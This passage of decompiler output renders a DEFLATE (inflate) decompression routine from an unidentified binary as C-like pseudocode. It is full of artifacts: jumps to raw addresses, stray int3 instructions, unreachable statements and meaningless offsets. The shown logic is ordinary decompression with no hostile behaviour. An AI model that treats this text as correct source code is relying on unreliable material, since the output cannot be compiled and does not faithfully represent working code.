    																							goto 0x330d81;
    																							asm("int3");
    																							if( *((intOrPtr*)(_t1704 + 0x1c)) !=  *((intOrPtr*)(_t2094 + 0x10))) {
    																								 *(_t2870 - 0x1c) = 0xfffffffe;
    																							}
    																						}
    																					}
    																					_t1688 =  *(_t2870 - 0x1c);
    																					goto L622;
    																				} else {
    																					goto L502;
    																				}
    																			} else {
    																				_t1789 =  *(_t2870 + 0x20) & 0x00000004;
    																				if(_t1789 == 0) {
    																					goto L498;
    																				} else {
    																					L495:
    																					 *(_t2870 - 0x1c) = 0xffffffff;
    																					_t2086 =  *(_t2870 + 8);
    																					 *_t2086 = 0x25;
    																				}
    																			}
    																		} else {
    																			L476:
    																			_t2233 =  *(_t2870 - 8);
    																			if(_t2233 >=  *(_t2870 - 0x24)) {
    																				L490:
    																				goto 0x330cba;
    																				asm("int3");
    																				asm("int3");
    																				asm("int3");
    																				 *(_t2870 - 0x120) = (_t2592 << _t2233) - 0x00000001 &  *(_t2870 - 0xc);
    																				 *(_t2870 - 0xc) =  *(_t2870 - 0xc) >>  *(_t2870 - 0x24);
    																				 *(_t2870 - 8) =  *(_t2870 - 8) -  *(_t2870 - 0x24);
    																				_t2592 = 0;
    																				if(0 != 0) {
    																					goto L476;
    																				} else {
    																					_t1789 =  *(_t2870 - 0x28) +  *(_t2870 - 0x120);
    																					 *(_t2870 - 0x28) = _t1789;
    																					goto L493;
    																				}
    																			} else {
    																				L477:
    																				_t2465 =  *(_t2870 - 4);
    																				if(_t2465 <  *((intOrPtr*)(_t2870 - 0x18))) {
    																					 *(_t2870 - 0xdc) =  *( *(_t2870 - 4)) & 0x000000ff;
    																					 *(_t2870 - 4) =  *(_t2870 - 4) + 1;
    																					goto L488;
    																				} else {
    																					L478:
    																					_t1692 =  *(_t2870 + 0x20) & 0x00000002;
    																					if(_t1692 == 0) {
    																						 *(_t2870 - 0xdc) = 0;
    																						L486:
    																						L488:
    																						if(0 != 0) {
    																							goto L477;
    																						} else {
    																							_t2592 =  *(_t2870 - 0xdc) <<  *(_t2870 - 8) |  *(_t2870 - 0xc);
    																							 *(_t2870 - 0xc) = _t2592;
    																							 *(_t2870 - 8) =  *(_t2870 - 8) + 8;
    																							_t2233 =  *(_t2870 - 8);
    																							if(_t2233 <  *(_t2870 - 0x24)) {
    																								goto L477;
    																							} else {
    																								goto L490;
    																							}
    																						}
    																					} else {
    																						L479:
    																						 *(_t2870 - 0x1c) = 1;
    																						_t2086 =  *(_t2870 + 8);
    																						 *_t2086 = 0x1b;
    																					}
    																				}
    																			}
    																		}
    																	}
    																} else {
    																	_t2190 =  *((intOrPtr*)(_t2870 - 0x18)) -  *(_t2870 - 4);
    																	if(_t2190 >= 2) {
    																		_t1769 = ( *( *(_t2870 - 4) + (1 << 0)) & 0x000000ff) <<  *(_t2870 - 8) + 8;
    																		 *(_t2870 - 0xc) = ( *( *(_t2870 - 4) + _t2190 * 0) & 0x000000ff) <<  *(_t2870 - 8) | 0x00000001 |  *(_t2870 - 0xc);
    																		 *(_t2870 - 4) =  *(_t2870 - 4) + 2;
    																		 *(_t2870 - 8) =  *(_t2870 - 8) + 0x10;
    																		goto L468;
    																	} else {
    																		L439:
    																		_t1769 =  *((short*)( *(_t2870 + 8) + (_t2566 << 0) + 0x40 + 0x120 + ( *(_t2870 - 0xc) & 0x000003ff) * 2));
    																		 *(_t2870 - 0x44) = _t1769;
    																		if( *(_t2870 - 0x44) < 0) {
    																			if( *(_t2870 - 8) <= 0xa) {
    																				goto L452;
    																			} else {
    																				 *(_t2870 - 0x4c) = 0xa;
    																				do {
    																					_t2588 =  *(_t2870 + 8) + (_t1769 << 0) + 0x40;
    																					_t1769 =  !( *(_t2870 - 0x44)) + ( *(_t2870 - 0xc) >>  *(_t2870 - 0x4c) & 0x00000001);
    																					 *(_t2870 - 0x44) =  *((short*)(_t2588 + 0x920 + _t1769 * 2));
    																					 *(_t2870 - 0x4c) =  *(_t2870 - 0x4c) + 1;
    																					if( *(_t2870 - 0x44) < 0) {
    																						goto L449;
    																					}
    																					break;
    																					L449:
    																					_t1769 =  *(_t2870 - 0x4c) + 1;
    																				} while ( *(_t2870 - 8) >= _t1769);
    																				if( *(_t2870 - 0x44) < 0) {
    																					goto L452;
    																				} else {
    																					goto L465;
    																				}
    																			}
    																		} else {
    																			 *(_t2870 - 0x4c) =  *(_t2870 - 0x44) >> 9;
    																			if( *(_t2870 - 0x4c) == 0 ||  *(_t2870 - 8) <  *(_t2870 - 0x4c)) {
    																				L452:
    																				_t2086 =  *(_t2870 - 4);
    																				if(_t2086 <  *((intOrPtr*)(_t2870 - 0x18))) {
    																					 *(_t2870 - 0xd4) =  *( *(_t2870 - 4)) & 0x000000ff;
    																					 *(_t2870 - 4) =  *(_t2870 - 4) + 1;
    																					goto L463;
    																				} else {
    																					L453:
    																					_t2465 =  *(_t2870 + 0x20) & 0x00000002;
    																					if(_t2465 == 0) {
    																						 *(_t2870 - 0xd4) = 0;
    																						L461:
    																						L463:
    																						if(0 != 0) {
    																							goto L452;
    																						} else {
    																							_t2566 =  *(_t2870 - 0xd4) <<  *(_t2870 - 8) |  *(_t2870 - 0xc);
    																							 *(_t2870 - 0xc) = _t2566;
    																							_t1769 =  *(_t2870 - 8) + 8;
    																							 *(_t2870 - 8) = _t1769;
    																							if( *(_t2870 - 8) < 0xf) {
    																								goto L439;
    																							} else {
    																								goto L465;
    																							}
    																						}
    																					} else {
    																						L454:
    																						 *(_t2870 - 0x1c) = 1;
    																						_t1692 =  *(_t2870 + 8);
    																						 *_t1692 = 0x1a;
    																					}
    																				}
    																			} else {
    																				L465:
    																				goto L468;
    																			}
    																		}
    																	}
    																}
    															} else {
    																L421:
    																if( *(_t2870 - 8) >=  *(_t2870 - 0x24)) {
    																	L435:
    																	goto 0x330c45;
    																	asm("int3");
    																	asm("int3");
    																	asm("int3");
    																	 *(_t2870 - 0x124) = (_t2566 << _t2180) - 0x00000001 &  *(_t2870 - 0xc);
    																	 *(_t2870 - 0xc) =  *(_t2870 - 0xc) >>  *(_t2870 - 0x24);
    																	_t2180 =  *(_t2870 - 8) -  *(_t2870 - 0x24);
    																	 *(_t2870 - 8) = _t2180;
    																	_t2566 = 0;
    																	if(0 != 0) {
    																		goto L421;
    																	} else {
    																		_t1769 =  *(_t2870 - 0x10) +  *(_t2870 - 0x124);
    																		 *(_t2870 - 0x10) = _t1769;
    																		goto L437;
    																	}
    																} else {
    																	L422:
    																	_t2086 =  *(_t2870 - 4);
    																	if(_t2086 <  *((intOrPtr*)(_t2870 - 0x18))) {
    																		 *(_t2870 - 0xa4) =  *( *(_t2870 - 4)) & 0x000000ff;
    																		 *(_t2870 - 4) =  *(_t2870 - 4) + 1;
    																		goto L433;
    																	} else {
    																		L423:
    																		_t2465 =  *(_t2870 + 0x20) & 0x00000002;
    																		if(_t2465 == 0) {
    																			 *(_t2870 - 0xa4) = 0;
    																			L431:
    																			L433:
    																			if(0 != 0) {
    																				goto L422;
    																			} else {
    																				_t2566 =  *(_t2870 - 0xa4) <<  *(_t2870 - 8) |  *(_t2870 - 0xc);
    																				 *(_t2870 - 0xc) = _t2566;
    																				 *(_t2870 - 8) =  *(_t2870 - 8) + 8;
    																				_t2180 =  *(_t2870 - 8);
    																				if(_t2180 <  *(_t2870 - 0x24)) {
    																					goto L422;
    																				} else {
    																					goto L435;
    																				}
    																			}
    																		} else {
    																			L424:
    																			 *(_t2870 - 0x1c) = 1;
    																			_t1692 =  *(_t2870 + 8);
    																			 *_t1692 = 0x19;
    																		}
    																	}
    																}
    															}
    														} else {
    															L531:
    															_t1692 =  *( *(_t2870 + 8) + 0x14) & 0x00000001;
    															if(_t1692 == 0) {
    																L48:
    																if( *(_t2870 - 8) >= 3) {
    																	L62:
    																	 *( *(_t2870 + 8) + 0x14) =  *(_t2870 - 0xc) & 0x00000007;
    																	 *(_t2870 - 0xc) =  *(_t2870 - 0xc) >> 3;
    																	 *(_t2870 - 8) =  *(_t2870 - 8) - 3;
    																	if(0 != 0) {
    																		goto L48;
    																	} else {
    																		 *( *(_t2870 + 8) + 0x18) =  *( *(_t2870 + 8) + 0x14) >> 1;
    																		_t1692 =  *(_t2870 + 8);
    																		if( *((intOrPtr*)(_t1692 + 0x18)) != 0) {
    																			_t2086 =  *(_t2870 + 8);
    																			if( *((intOrPtr*)(_t2086 + 0x18)) != 3) {
    																				if( *( *(_t2870 + 8) + 0x18) != 1) {
    																					 *(_t2870 - 0x10) = 0;
    																					L189:
    																					if( *(_t2870 - 0x10) >= 3) {
    																						goto 0x330a5e;
    																						asm("int3");
    																						asm("int3");
    																						asm("int3");
    																						asm("int3");
    																						asm("int3");
    																						asm("int3");
    																						asm("int3");
    																						_push( *(_t2870 + 8) + (_t1692 << 1) + 0x40);
    																						_t1743 =  *( *0x00DA9D9D)();
    																						_t2873 = _t2873 + 0xc;
    																						 *(_t2870 - 0x10) = 0;
    																						L210:
    																						_t2136 =  *(_t2870 + 8);
    																						if( *(_t2870 - 0x10) >=  *((intOrPtr*)(_t2136 + (_t1743 << 1) + 0x2c))) {
    																							 *((intOrPtr*)( *(_t2870 + 8) + (_t2136 << 1) + 0x2c)) = 0x13;
    																							goto L231;
    																						} else {
    																							L212:
    																							if( *(_t2870 - 8) >= 3) {
    																								L226:
    																								 *(_t2870 - 0x114) =  *(_t2870 - 0xc) & 0x00000007;
    																								_t1987 =  *(_t2870 - 0xc) >> 3;
    																								 *(_t2870 - 0xc) = _t1987;
    																								 *(_t2870 - 8) =  *(_t2870 - 8) - 3;
    																								if(0 != 0) {
    																									goto L212;
    																								} else {
    																									_t1743 =  *(_t2870 - 0x114);
    																									 *( *(_t2870 + 8) + (_t1987 << 1) + 0x40 + ( *( *(_t2870 - 0x10) + 0x1fba14) & 0x000000ff)) = _t1743;
    																									 *(_t2870 - 0x10) =  *(_t2870 - 0x10) + 1;
    																									goto L210;
    																								}
    																							} else {
    																								L213:
    																								_t1692 =  *(_t2870 - 4);
    																								if(_t1692 <  *((intOrPtr*)(_t2870 - 0x18))) {
    																									 *(_t2870 - 0xc0) =  *( *(_t2870 - 4)) & 0x000000ff;
    																									 *(_t2870 - 4) =  *(_t2870 - 4) + 1;
    																									goto L224;
    																								} else {
    																									L214:
    																									_t2086 =  *(_t2870 + 0x20) & 0x00000002;
    																									if(_t2086 == 0) {
    																										 *(_t2870 - 0xc0) = 0;
    																										L222:
    																										L224:
    																										if(0 != 0) {
    																											goto L213;
    																										} else {
    																											 *(_t2870 - 0xc) =  *(_t2870 - 0xc0) <<  *(_t2870 - 8) |  *(_t2870 - 0xc);
    																											 *(_t2870 - 8) =  *(_t2870 - 8) + 8;
    																											if( *(_t2870 - 8) < 3) {
    																												goto L213;
    																											} else {
    																												goto L226;
    																											}
    																										}
    																									} else {
    																										L215:
    																										 *(_t2870 - 0x1c) = 1;
    																										_t2465 =  *(_t2870 + 8);
    																										 *_t2465 = 0xe;
    																									}
    																								}
    																							}
    																						}
    																					} else {
    																						L190:
    																						_t428 =  *(_t2870 - 0x10) + 0x1fb010; // 0x7030200
    																						if( *(_t2870 - 8) >=  *_t428) {
    																							L204:
    																							_t456 =  *(_t2870 - 0x10) + 0x1fb010; // 0x7030200
    																							 *( *(_t2870 + 8) + 0x2c +  *(_t2870 - 0x10) * 4) = (0x00000001 <<  *_t456) - 0x00000001 &  *(_t2870 - 0xc);
    																							_t464 =  *(_t2870 - 0x10) + 0x1fb010; // 0x7030200
    																							 *(_t2870 - 0xc) =  *(_t2870 - 0xc) >>  *_t464;
    																							_t468 =  *(_t2870 - 0x10) + 0x1fb010; // 0x7030200
    																							_t2759 =  *_t468;
    																							_t2000 =  *(_t2870 - 8) - _t2759;
    																							 *(_t2870 - 8) = _t2000;
    																							if(0 != 0) {
    																								goto L190;
    																							} else {
    																								goto 0x330a4a;
    																								asm("int3");
    																								_t1692 =  *(_t2870 - 0x10);
    																								 *((intOrPtr*)( *(_t2870 + 8) + 0x2c + _t1692 * 4)) =  *((intOrPtr*)(_t2000 + 0x2c + _t2759 * 4)) +  *((intOrPtr*)(0x1fba28 +  *(_t2870 - 0x10) * 4));
    																								 *(_t2870 - 0x10) =  *(_t2870 - 0x10) + 1;
    																								goto L189;
    																							}
    																						} else {
    																							L191:
    																							_t2465 =  *(_t2870 - 4);
    																							if(_t2465 <  *((intOrPtr*)(_t2870 - 0x18))) {
    																								 *(_t2870 - 0xe0) =  *( *(_t2870 - 4)) & 0x000000ff;
    																								 *(_t2870 - 4) =  *(_t2870 - 4) + 1;
    																								goto L202;
    																							} else {
    																								L192:
    																								_t1692 =  *(_t2870 + 0x20) & 0x00000002;
    																								if(_t1692 == 0) {
    																									 *(_t2870 - 0xe0) = 0;
    																									L200:
    																									L202:
    																									if(0 != 0) {
    																										goto L191;
    																									} else {
    																										 *(_t2870 - 0xc) =  *(_t2870 - 0xe0) <<  *(_t2870 - 8) |  *(_t2870 - 0xc);
    																										 *(_t2870 - 8) =  *(_t2870 - 8) + 8;
    																										_t453 =  *(_t2870 - 0x10) + 0x1fb010; // 0x7030200
    																										if( *(_t2870 - 8) <  *_t453) {
    																											goto L191;
    																										} else {
    																											goto L204;
    																										}
    																									}
    																								} else {
    																									L193:
    																									 *(_t2870 - 0x1c) = 1;
    																									_t2086 =  *(_t2870 + 8);
    																									 *_t2086 = 0xb;
    																								}
    																							}
    																						}
    																					}
    																				} else {
    																					 *(_t2870 - 0x60) =  *(_t2870 + 8) + 0x40 + _t1692 * 0;
    																					 *((intOrPtr*)( *(_t2870 + 8) + 0x2c)) = 0x120;
    																					 *( *(_t2870 + 8) + 0xbadbd9) = 0x20;
    																					_push(0x20);
    																					_push(5);
    																					_push( *(_t2870 + 8) + 0xbadbed);
    																					_t2086 =  *0x00DA9D9D;
    																					 *_t2086();
    																					_t2873 = _t2873 + 0xc;
    																					 *(_t2870 - 0x5c) = 0;
    																					while( *(_t2870 - 0x5c) <= 0x8f) {
    																						 *( *(_t2870 - 0x60)) = 8;
    																						_t2086 =  *(_t2870 - 0x60) + 1;
    																						 *(_t2870 - 0x60) = _t2086;
    																						 *(_t2870 - 0x5c) =  *(_t2870 - 0x5c) + 1;
    																					}
    																					while( *(_t2870 - 0x5c) <= 0xff) {
    																						 *( *(_t2870 - 0x60)) = 9;
    																						_t2086 =  *(_t2870 - 0x60) + 1;
    																						 *(_t2870 - 0x60) = _t2086;
    																						 *(_t2870 - 0x5c) =  *(_t2870 - 0x5c) + 1;
    																					}
    																					while( *(_t2870 - 0x5c) <= 0x117) {
    																						 *( *(_t2870 - 0x60)) = 7;
    																						_t2086 =  *(_t2870 - 0x60) + 1;
    																						 *(_t2870 - 0x60) = _t2086;
    																						 *(_t2870 - 0x5c) =  *(_t2870 - 0x5c) + 1;
    																					}
    																					while( *(_t2870 - 0x5c) <= 0x11f) {
    																						 *( *(_t2870 - 0x60)) = 8;
    																						_t2086 =  *(_t2870 - 0x60) + 1;
    																						 *(_t2870 - 0x60) = _t2086;
    																						 *(_t2870 - 0x5c) =  *(_t2870 - 0x5c) + 1;
    																					}
    																					L231:
    																					L233:
    																					if( *( *(_t2870 + 8) + 0x18) < 0) {
    																						goto L350;
    																					} else {
    																						 *((intOrPtr*)(_t2870 - 0x68)) =  *(_t2870 + 8) + 0x40 +  *( *(_t2870 + 8) + 0x18) * 0xda0;
    																						_push(0x40);
    																						_push(0);
    																						_push(_t2870 - 0x1a8);
    																						 *( *0x00DA9D9D)();
    																						_push(0x800);
    																						_push(0);
    																						_push( *((intOrPtr*)(_t2870 - 0x68)) + 0x120);
    																						 *( *0x00DA9D9D)();
    																						_push(0x480);
    																						_push(0);
    																						_push( *((intOrPtr*)(_t2870 - 0x68)) + 0x920);
    																						 *( *0x00DA9D9D)();
    																						_t2873 = _t2873 + 0x24;
    																						 *(_t2870 - 0x64) = 0;
    																						while( *(_t2870 - 0x64) <  *((intOrPtr*)( *(_t2870 + 8) + 0x2c +  *( *(_t2870 + 8) + 0x18) * 4))) {
    																							 *((intOrPtr*)(_t2870 + ( *( *((intOrPtr*)(_t2870 - 0x68)) +  *(_t2870 - 0x64)) & 0x000000ff) * 4 - 0x1a8)) =  *((intOrPtr*)(_t2870 + ( *( *((intOrPtr*)(_t2870 - 0x68)) +  *(_t2870 - 0x64)) & 0x000000ff) * 4 - 0x1a8)) + 1;
    																							 *(_t2870 - 0x64) =  *(_t2870 - 0x64) + 1;
    																						}
    																						 *(_t2870 - 0xd8) = 0;
    																						 *(_t2870 - 0x9c) = 0;
    																						_t1692 = 4 << 0;
    																						 *(_t2870 + 0xfffffffffffffe9c) = 0;
    																						_t2465 = 0;
    																						 *(_t2870 + 0xfffffffffffffe98) = 0;
    																						 *(_t2870 - 0x64) = 1;
    																						while( *(_t2870 - 0x64) <= 0xf) {
    																							 *(_t2870 - 0xd8) =  *(_t2870 - 0xd8) +  *((intOrPtr*)(_t2870 +  *(_t2870 - 0x64) * 4 - 0x1a8));
    																							 *(_t2870 - 0x9c) =  *(_t2870 - 0x9c) +  *((intOrPtr*)(_t2870 +  *(_t2870 - 0x64) * 4 - 0x1a8)) << 1;
    																							_t2465 =  *(_t2870 - 0x64);
    																							 *(_t2870 + _t2465 * 4 - 0x164) =  *(_t2870 - 0x9c);
    																							_t1692 =  *(_t2870 - 0x64) + 1;
    																							 *(_t2870 - 0x64) = _t1692;
    																						}
    																						if( *(_t2870 - 0x9c) == 0x10000 ||  *(_t2870 - 0xd8) <= 1) {
    																							 *(_t2870 - 0x78) = 0xffffffff;
    																							 *(_t2870 - 0x80) = 0;
    																							while(1) {
    																								_t2666 =  *(_t2870 - 0x80);
    																								if(_t2666 >=  *((intOrPtr*)( *(_t2870 + 8) + 0x2c +  *( *(_t2870 + 8) + 0x18) * 4))) {
    																									break;
    																								}
    																								 *(_t2870 - 0x34) = 0;
    																								 *(_t2870 - 0x74) =  *( *((intOrPtr*)(_t2870 - 0x68)) +  *(_t2870 - 0x80)) & 0x000000ff;
    																								if( *(_t2870 - 0x74) != 0) {
    																									 *(_t2870 - 0xe8) =  *(_t2870 +  *(_t2870 - 0x74) * 4 - 0x168);
    																									_t2719 =  *(_t2870 +  *(_t2870 - 0x74) * 4 - 0x168) + 1;
    																									 *(_t2870 +  *(_t2870 - 0x74) * 4 - 0x168) = _t2719;
    																									_t2331 =  *(_t2870 - 0x74);
    																									 *(_t2870 - 0xc8) = _t2331;
    																									while( *(_t2870 - 0xc8) > 0) {
    																										_t2331 =  *(_t2870 - 0x34) << 0x00000001 |  *(_t2870 - 0xe8) & 0x00000001;
    																										 *(_t2870 - 0x34) = _t2331;
    																										_t2719 =  *(_t2870 - 0xc8) - 1;
    																										 *(_t2870 - 0xc8) = _t2719;
    																										 *(_t2870 - 0xe8) =  *(_t2870 - 0xe8) >> 1;
    																									}
    																									if( *(_t2870 - 0x74) > 0xa) {
    																										 *(_t2870 - 0x6c) =  *((short*)( *((intOrPtr*)(_t2870 - 0x68)) + 0x120 + ( *(_t2870 - 0x34) & 0x000003ff) * 2));
    																										if( *(_t2870 - 0x6c) == 0) {
    																											 *((short*)( *((intOrPtr*)(_t2870 - 0x68)) + 0x120 + ( *(_t2870 - 0x34) & 0x000003ff) * 2)) =  *(_t2870 - 0x78);
    																											 *(_t2870 - 0x6c) =  *(_t2870 - 0x78);
    																											 *(_t2870 - 0x78) =  *(_t2870 - 0x78) - 2;
    																										}
    																										 *(_t2870 - 0x34) =  *(_t2870 - 0x34) >> 9;
    																										 *(_t2870 - 0xd0) =  *(_t2870 - 0x74);
    																										while( *(_t2870 - 0xd0) > 0xb) {
    																											 *(_t2870 - 0x34) =  *(_t2870 - 0x34) >> 1;
    																											 *(_t2870 - 0x6c) =  *(_t2870 - 0x6c) - ( *(_t2870 - 0x34) & 0x00000001);
    																											if( *((short*)( *((intOrPtr*)(_t2870 - 0x68)) + 0x91e +  ~( *(_t2870 - 0x6c)) * 2)) != 0) {
    																												 *(_t2870 - 0x6c) =  *((short*)( *((intOrPtr*)(_t2870 - 0x68)) + 0x91e +  ~( *(_t2870 - 0x6c)) * 2));
    																											} else {
    																												 *((short*)( *((intOrPtr*)(_t2870 - 0x68)) + 0x91e +  ~( *(_t2870 - 0x6c)) * 2)) =  *(_t2870 - 0x78);
    																												 *(_t2870 - 0x6c) =  *(_t2870 - 0x78);
    																												 *(_t2870 - 0x78) =  *(_t2870 - 0x78) - 2;
    																											}
    																											 *(_t2870 - 0xd0) =  *(_t2870 - 0xd0) - 1;
    																										}
    																										 *(_t2870 - 0x34) =  *(_t2870 - 0x34) >> 1;
    																										 *(_t2870 - 0x6c) =  *(_t2870 - 0x6c) - ( *(_t2870 - 0x34) & 0x00000001);
    																										 *((short*)( *((intOrPtr*)(_t2870 - 0x68)) + 0x91e +  ~( *(_t2870 - 0x6c)) * 2)) =  *(_t2870 - 0x80);
    																									} else {
    																										 *((short*)(_t2870 - 0xcc)) =  *(_t2870 - 0x74) << 0x00000009 |  *(_t2870 - 0x80);
    																										while( *(_t2870 - 0x34) < 0x400) {
    																											goto 0x330ab1;
    																											asm("int3");
    																											 *((short*)(_t2719 + 0x120 + _t2331 * 2)) =  *((intOrPtr*)(_t2870 - 0xcc));
    																											_t2331 =  *(_t2870 - 0x74);
    																											_t2719 = (1 << _t2331) +  *(_t2870 - 0x34);
    																											 *(_t2870 - 0x34) = 1;
    																										}
    																									}
    																									goto L248;
    																								} else {
    																									L248:
    																									 *(_t2870 - 0x80) =  *(_t2870 - 0x80) + 1;
    																									continue;
    																								}
    																								break;
    																							}
    																							if( *( *(_t2870 + 8) + 0x18) != 2) {
    																								L349:
    																								_t2086 =  *( *(_t2870 + 8) + 0x18) - 1;
    																								 *( *(_t2870 + 8) + 0x18) = _t2086;
    																								goto L233;
    																							} else {
    																								 *(_t2870 - 0x10) = 0;
    																								L274:
    																								_t2669 =  *(_t2870 + 8);
    																								_t1900 =  *((intOrPtr*)( *(_t2870 + 8) + 0x2c + _t2666 * 0)) +  *((intOrPtr*)(_t2669 + 0x30));
    																								if( *(_t2870 - 0x10) >= _t1900) {
    																									_t2086 = 4 << 0;
    																									_t2465 =  *(_t2870 + 8);
    																									_t1903 =  *((intOrPtr*)( *(_t2870 + 8) + 0x2c + _t2669 * 0)) +  *((intOrPtr*)(_t2465 + 0x30));
    																									if(_t1903 ==  *(_t2870 - 0x10)) {
    																										_push( *((intOrPtr*)( *(_t2870 + 8) + 0x2c + _t1903 * 0)));
    																										_push( *(_t2870 + 8) + 0x2924);
    																										_push( *(_t2870 + 8) + 0x40);
    																										 *((intOrPtr*)( *0x001FC1F0))();
    																										_push( *( *(_t2870 + 8) + 0xbadbd9));
    																										_push( *(_t2870 + 8) +  *((intOrPtr*)( *(_t2870 + 8) + 0x2c)) + 0x2924);
    																										_push( *(_t2870 + 8) + 0xbadbed);
    																										 *((intOrPtr*)( *((intOrPtr*)(0x1fc1f0))))();
    																										_t2873 = _t2873 + 0x18;
    																										goto L349;
    																									} else {
    																										L344:
    																										 *(_t2870 - 0x1c) = 0xffffffff;
    																										_t1692 =  *(_t2870 + 8);
    																										 *_t1692 = 0x15;
    																									}
    																								} else {
    																									L276:
    																									if( *(_t2870 - 8) >= 0xf) {
    																										L307:
    																										_t2296 =  *((short*)( *(_t2870 + 8) + (_t1900 << 1) + 0x40 + 0x120 + ( *(_t2870 - 0xc) & 0x000003ff) * 2));
    																										 *(_t2870 - 0x40) = _t2296;
    																										if( *(_t2870 - 0x40) < 0) {
    																											 *(_t2870 - 0x48) = 0xa;
    																											do {
    																												 *(_t2870 - 0x40) =  *((short*)( *(_t2870 + 8) + (_t2296 << 1) + 0x40 + 0x920 + ( !( *(_t2870 - 0x40)) + ( *(_t2870 - 0xc) >>  *(_t2870 - 0x48) & 0x00000001)) * 2));
    																												_t2296 =  *(_t2870 - 0x48) + 1;
    																												 *(_t2870 - 0x48) = _t2296;
    																											} while ( *(_t2870 - 0x40) < 0);
    																										} else {
    																											 *(_t2870 - 0x48) =  *(_t2870 - 0x40) >> 9;
    																											 *(_t2870 - 0x40) =  *(_t2870 - 0x40) & 0x000001ff;
    																										}
    																										 *(_t2870 - 0x28) =  *(_t2870 - 0x40);
    																										_t1900 =  *(_t2870 - 0xc) >>  *(_t2870 - 0x48);
    																										 *(_t2870 - 0xc) = _t1900;
    																										_t2086 =  *(_t2870 - 8) -  *(_t2870 - 0x48);
    																										 *(_t2870 - 8) = _t2086;
    																										_t2465 = 0;
    																										if(0 != 0) {
    																											goto L276;
    																										} else {
    																											if( *(_t2870 - 0x28) >= 0x10) {
    																												if( *(_t2870 - 0x28) != 0x10 ||  *(_t2870 - 0x10) != 0) {
    																													_t1937 =  *(_t2870 - 0x28);
    																													_t841 = _t1937 + 0x1fb004; // 0x70302
    																													_t2315 =  *_t841;
    																													 *(_t2870 - 0x24) = _t2315;
    																													L322:
    																													if( *(_t2870 - 8) >=  *(_t2870 - 0x24)) {
    																														L336:
    																														goto 0x330b37;
    																														asm("int3");
    																														asm("int3");
    																														asm("int3");
    																														 *(_t2870 - 0x8c) = (_t1937 << _t2315) - 0x00000001 &  *(_t2870 - 0xc);
    																														 *(_t2870 - 0xc) =  *(_t2870 - 0xc) >>  *(_t2870 - 0x24);
    																														_t1937 =  *(_t2870 - 8) -  *(_t2870 - 0x24);
    																														 *(_t2870 - 8) = _t1937;
    																														_t2315 = 0;
    																														if(0 != 0) {
    																															goto L322;
    																														} else {
    																															 *(_t2870 - 0x8c) =  *((char*)( *(_t2870 - 0x28) + 0x1fb008)) +  *(_t2870 - 0x8c);
    																															if( *(_t2870 - 0x28) != 0x10) {
    																																 *(_t2870 - 0x108) = 0;
    																															} else {
    																																 *(_t2870 - 0x108) =  *( *(_t2870 + 8) +  *(_t2870 - 0x10) + 0x2923) & 0x000000ff;
    																															}
    																															_push( *(_t2870 - 0x8c));
    																															_push( *(_t2870 - 0x108));
    																															_push( *(_t2870 + 8) +  *(_t2870 - 0x10) + 0x2924);
    																															_t2666 = 4 << 0;
    																															 *((intOrPtr*)( *0x001FC1F4))();
    																															_t2873 = _t2873 + 0xc;
    																															 *(_t2870 - 0x10) =  *(_t2870 - 0x10) +  *(_t2870 - 0x8c);
    																															goto L274;
    																														}
    																													} else {
    																														L323:
    																														_t1692 =  *(_t2870 - 4);
    																														if(_t1692 <  *((intOrPtr*)(_t2870 - 0x18))) {
    																															 *(_t2870 - 0xbc) =  *( *(_t2870 - 4)) & 0x000000ff;
    																															 *(_t2870 - 4) =  *(_t2870 - 4) + 1;
    																															goto L334;
    																														} else {
    																															L324:
    																															_t2086 =  *(_t2870 + 0x20) & 0x00000002;
    																															if(_t2086 == 0) {
    																																 *(_t2870 - 0xbc) = 0;
    																																L332:
    																																L334:
    																																if(0 != 0) {
    																																	goto L323;
    																																} else {
    																																	_t1937 =  *(_t2870 - 0xbc) <<  *(_t2870 - 8) |  *(_t2870 - 0xc);
    																																	 *(_t2870 - 0xc) = _t1937;
    																																	_t2315 =  *(_t2870 - 8) + 8;
    																																	 *(_t2870 - 8) = _t2315;
    																																	if( *(_t2870 - 8) <  *(_t2870 - 0x24)) {
    																																		goto L323;
    																																	} else {
    																																		goto L336;
    																																	}
    																																}
    																															} else {
    																																L325:
    																																 *(_t2870 - 0x1c) = 1;
    																																_t2465 =  *(_t2870 + 8);
    																																 *_t2465 = 0x12;
    																															}
    																														}
    																													}
    																												} else {
    																													L318:
    																													 *(_t2870 - 0x1c) = 0xffffffff;
    																													_t1692 =  *(_t2870 + 8);
    																													 *_t1692 = 0x11;
    																												}
    																											} else {
    																												 *((char*)( *(_t2870 + 8) +  *(_t2870 - 0x10) + 0x2924)) =  *(_t2870 - 0x28);
    																												_t2666 =  *(_t2870 - 0x10) + 1;
    																												 *(_t2870 - 0x10) = _t2666;
    																												goto L274;
    																											}
    																										}
    																									} else {
    																										if( *((intOrPtr*)(_t2870 - 0x18)) -  *(_t2870 - 4) >= 2) {
    																											_t1900 = ( *( *(_t2870 - 4) + (1 << 0)) & 0x000000ff) <<  *(_t2870 - 8) + 8;
    																											 *(_t2870 - 0xc) = ( *( *(_t2870 - 4) + _t2086 * 0) & 0x000000ff) <<  *(_t2870 - 8) | 0x00000001 |  *(_t2870 - 0xc);
    																											 *(_t2870 - 4) =  *(_t2870 - 4) + 2;
    																											 *(_t2870 - 8) =  *(_t2870 - 8) + 0x10;
    																											goto L307;
    																										} else {
    																											L278:
    																											_t2694 =  *((short*)( *(_t2870 + 8) + (_t2086 << 1) + 0x40 + 0x120 + ( *(_t2870 - 0xc) & 0x000003ff) * 2));
    																											 *(_t2870 - 0x40) = _t2694;
    																											if( *(_t2870 - 0x40) < 0) {
    																												if( *(_t2870 - 8) <= 0xa) {
    																													goto L291;
    																												} else {
    																													 *(_t2870 - 0x48) = 0xa;
    																													do {
    																														_t1900 =  !( *(_t2870 - 0x40)) + ( *(_t2870 - 0xc) >>  *(_t2870 - 0x48) & 0x00000001);
    																														 *(_t2870 - 0x40) =  *((short*)( *(_t2870 + 8) + (_t2694 << 1) + 0x40 + 0x920 + _t1900 * 2));
    																														_t2694 =  *(_t2870 - 0x48) + 1;
    																														 *(_t2870 - 0x48) = _t2694;
    																														if( *(_t2870 - 0x40) < 0) {
    																															goto L288;
    																														}
    																														break;
    																														L288:
    																														_t1900 =  *(_t2870 - 0x48) + 1;
    																													} while ( *(_t2870 - 8) >= _t1900);
    																													if( *(_t2870 - 0x40) < 0) {
    																														goto L291;
    																													} else {
    																														goto L304;
    																													}
    																												}
    																											} else {
    																												_t1900 =  *(_t2870 - 0x40) >> 9;
    																												 *(_t2870 - 0x48) = _t1900;
    																												if( *(_t2870 - 0x48) == 0 ||  *(_t2870 - 8) <  *(_t2870 - 0x48)) {
    																													L291:
